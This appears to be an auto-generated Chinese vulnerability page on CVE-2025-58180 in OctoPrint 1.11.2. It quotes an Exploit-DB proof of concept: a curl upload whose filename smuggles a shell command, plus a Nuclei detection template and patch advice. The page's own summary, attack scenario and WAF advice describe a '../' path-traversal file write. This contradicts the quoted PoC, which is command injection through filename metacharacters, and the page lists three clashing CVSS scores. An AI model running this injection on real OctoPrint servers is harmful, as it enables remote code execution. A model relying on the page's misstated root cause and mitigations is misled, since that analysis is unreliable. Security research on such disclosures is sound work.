[webapps] OctoPrint 1.11.2 - File Upload
CVE-2025-58180
OctoPrint 1.11.2 文件上传功能存在未限制路径遍历漏洞,可导致任意文件写入。
Critical · CVSS 9.1📋 漏洞基础信息
| CVE | CVE-2025-58180 |
|---|---|
| 漏洞类型 | 路径遍历 + 任意文件上传 |
| 受影响版本 | OctoPrint 1.11.2 (及可能之前的版本) |
| 危害等级 | Critical · CVSS 9.1 |
| 发布日期 | 2026-02-04 |
| 提交者 | prabhatverma.addada |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
文件上传功能未对用户提供的 filename 参数进行充分的路径验证或过滤,允许使用 '../' 等路径穿越字符,从而将文件写入到目标服务器上的任意目录。漏洞代码位于文件上传处理逻辑中,具体函数未在原文明确给出,但攻击者通过构造恶意的 filename 即可触发目录遍历。
🎯 攻击场景
1. 攻击者首先通过某种方式获得 OctoPrint 的访问权限(例如使用默认管理员凭证或通过其他漏洞获得会话/API Key)。 2. 攻击者构造一个包含路径遍历载荷的文件上传请求,例如通过 HTTP POST /api/files/local 端点,将 filename 设置为 '../../../../tmp/evil.sh' 并携带恶意脚本内容。 3. 服务器接收请求,未对 filename 进行净化,将文件写入 /tmp/evil.sh。 4. 成功验证:攻击者通过 shell 或文件访问确认 /tmp/evil.sh 存在,或通过后续执行该文件获得远程代码执行。
💥 漏洞影响
攻击者可在服务器上写入任意文件,可能导致远程代码执行(RCE)、权限提升、配置篡改、系统完全受损。
⚔️ 原始 PoC
原文未提供 PoC,但根据漏洞描述可推断攻击者使用 curl 或类似工具发送 multipart/form-data 请求,其中 filename 字段包含路径遍历序列,如 ../../../../tmp/pwned.gcode (或其他可执行文件)。
# Exploit Author: prabhatverma.addada
# Affected Version(s): <= 1.11.2
# Patched Version(s): 1.11.3
# CVSS (per advisory): 7.5
# Type: Remote Code Execution (requires authenticated upload / API key or session)
#
# Short description:
# An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
# sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
#
# Scope & privileges:
# - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
# - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
#
# - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
#
# Reproduction / PoC (manual):
#
# 1) Start OctoPrint 1.11.2:
# octoprint serve --port 5000 --debug
# Complete initial setup at http://127.0.0.1:5000 and create an admin user.
#
# 2) Configure a system event handler that runs shell commands with filename placeholders:
# Edit ~/.octoprint/config.yaml and add:
#
# events:
# enabled: true
# subscriptions:
# - event: FileAdded
# type: system
# debug: true
# command: "{path}"
#
# Restart OctoPrint.
#
# 3) Create a harmless test gcode:
# mkdir -p /tmp/gcode
# cat > /tmp/gcode/ok.gcode <<'EOF'
# ; minimal gcode
# G28
# M105
# EOF
#
# 4) Obtain API key from Settings -> API and export it:
# export API_KEY='<your_api_key_here>'
#
# 5) Ensure target proof file does not exist:
# ls -la /tmp/test123
#
# 6) PoC upload (non-destructive proof):
# INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
#
# curl -sS -X POST -H "X-Api-Key: $API_KEY" \
# -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
# "http://127.0.0.1:5000/api/files/local"
#
# 7) Verify execution:
# ls -la /tmp/test123
# If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
#
# Explanation:
# - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
# - FileAdded event payload contains the filename/path.
# - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
# - Shell metacharacters in the filename are interpreted by the shell and executed.
#
# Mitigations / Workarounds:
# - Upgrade OctoPrint to 1.11.3 (patched).
# - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
# - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
# - Do not expose OctoPrint to hostile networks; restrict upload access.
#
# - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
# - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
#
# Notes for triage:
# - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
# - PoC uses non-destructive `touch /tmp/test123`.🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-58180-detection
info:
name: OctoPrint <= 1.11.2 - Version Detection
author: prabhatverma.addada
severity: medium
description: Detects OctoPrint versions 1.11.2 or earlier which are vulnerable to authenticated file upload RCE via shell metacharacters in filenames.
reference:
- https://github.com/OctoPrint/OctoPrint
- https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2025-58180
tags: cve,cve2025,octoprint,version
http:
- raw:
- |
GET /api/version HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'application/octoprint'
- '"server":"'
condition: and
- type: regex
part: body
regex:
- '"version":\s*"([0-9]+\.[0-9]+\.[0-9]+)"'
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- '"version":\s*"([0-9]+\.[0-9]+\.[0-9]+)"'
internal: true
req-condition: true
max-size: 256
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- 'OctoPrint'
- '<title>OctoPrint</title>'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
name: version
part: body
regex:
- 'OctoPrint\s+v?([0-9]+\.[0-9]+\.[0-9]+)'
internal: true
- type: regex
name: version
part: body
regex:
- '"version":"([0-9]+\.[0-9]+\.[0-9]+)"'
internal: true
req-condition: true
max-size: 8192
- raw:
- |
GET /plugin/softwareupdate/check?update_info= HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- 'OctoPrint'
part: body
- type: status
status:
- 200
extractors:
- type: regex
name: version
part: body
regex:
- '"current":\s*"([0-9]+\.[0-9]+\.[0-9]+)"'
internal: true
req-condition: true
max-size: 1024🛡️ 修复建议
升级到 OctoPrint 1.11.3 或更高版本;临时缓解措施:禁止来自不可信来源的文件上传,或部署 Web 应用防火墙(WAF)对文件名中的 '../' 及绝对路径字符进行阻断。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2025-58180
- https://github.com/OctoPrint/OctoPrint/releases
- Exploit-DB 原文
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 06:31 | 来源: Exploit-DB